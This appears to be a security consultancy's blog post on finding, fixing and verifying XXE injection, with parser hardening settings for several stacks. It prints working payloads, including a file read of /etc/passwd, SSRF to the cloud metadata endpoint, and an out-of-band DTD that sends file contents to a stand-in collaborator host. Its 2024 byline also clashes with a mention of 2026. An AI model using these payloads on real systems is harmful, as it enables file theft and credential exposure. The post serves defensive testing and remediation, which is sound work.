XXE Injection: Find It, Fix It, Verify It
Cybersecurity
XML External Entity bugs persist because most XML parsers ship insecure defaults. Here's how authorized testers prove file read and blind OOB exfil, and the parser-by-parser settings that close the door.
By Arjun Raghavan, Security & Systems Lead, BIPI · December 26, 2024 · 7 min read
XML External Entity injection looks dated but still pays out four-figure bounties in 2026 because legacy parsers in Java, Python, and PHP keep DTD processing on by default. SAML, SOAP, DOCX import, SVG upload, and RSS feed parsing remain the highest-yield surfaces.
How to test for it
Capture any request with a Content-Type of application/xml, text/xml, application/soap+xml, or any endpoint that accepts SVG, DOCX, XLSX, or SAML responses. In Burp Repeater, prepend a DOCTYPE declaration that defines an external entity and reference it inside an existing element value.
- File read probe: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> then &xxe; in a value field.
- SSRF via XXE: swap the SYSTEM URI for http://169.254.169.254/latest/meta-data/.
- Blind XXE OOB: load an external DTD from your Collaborator that defines a parameter entity referencing file:// and exfiltrates via an HTTP GET.
- Billion laughs and quadratic blowup probes for DoS testing inside a controlled lab.
- SVG XXE: upload an SVG with a DOCTYPE prologue and check whether thumbnailing triggers entity resolution.
For blind cases, host an external DTD on your Collaborator that contains <!ENTITY % file SYSTEM "file:///etc/hostname"> and <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://collab/?x=%file;'>"> then chain the parameter entities. The leaked content arrives in the Collaborator HTTP log.
Common unsafe parsers
Python lxml before 4.9.1 with resolve_entities=True, Java's default DocumentBuilderFactory, PHP's libxml under 2.9.0, .NET XmlReader with ProhibitDtd left at default, and Ruby's Nokogiri when called with Nokogiri::XML::ParseOptions::DTDLOAD all process external entities unless explicitly hardened.
Detection
Watch for outbound DNS or HTTP from XML parser worker processes to anything other than the application's known dependency hostnames. WAF rules on body content matching <!DOCTYPE.*SYSTEM or <!ENTITY catch the loud cases. At the parser level, instrument an EntityResolver that logs every external entity request, then alert on any non-empty log line in production.
Remediation by stack
- Java JAXP: dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) plus setFeature for external-general-entities and external-parameter-entities set to false.
- Python lxml: parser = etree.XMLParser(resolve_entities=False, no_network=True, dtd_validation=False).
- Python defusedxml: replace xml.etree, xml.dom, and xml.sax imports with defusedxml equivalents across the codebase.
- PHP: libxml_disable_entity_loader(true) on PHP 7, and avoid LIBXML_DTDLOAD or LIBXML_NOENT flags on PHP 8.
- .NET: XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit, XmlResolver = null }.
- Node libxmljs2: pass { noent: false, dtdload: false, dtdvalid: false } to parseXml.
Validation
Re-run the file:// and OOB probes. Add a unit test that feeds a known XXE payload to your XML entry points and asserts the parser raises a DTD-forbidden exception. Run nuclei with -t http/vulnerabilities/generic/xxe.yaml across staging. Track parser library versions in your SBOM and gate CI on a minimum version that ships safe defaults.
Our team has remediated XXE in SAML implementations, document conversion pipelines, and SCAP scanners. The fix is always the same parser flag, but finding every parser instance across a polyglot codebase is what takes the time.
Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.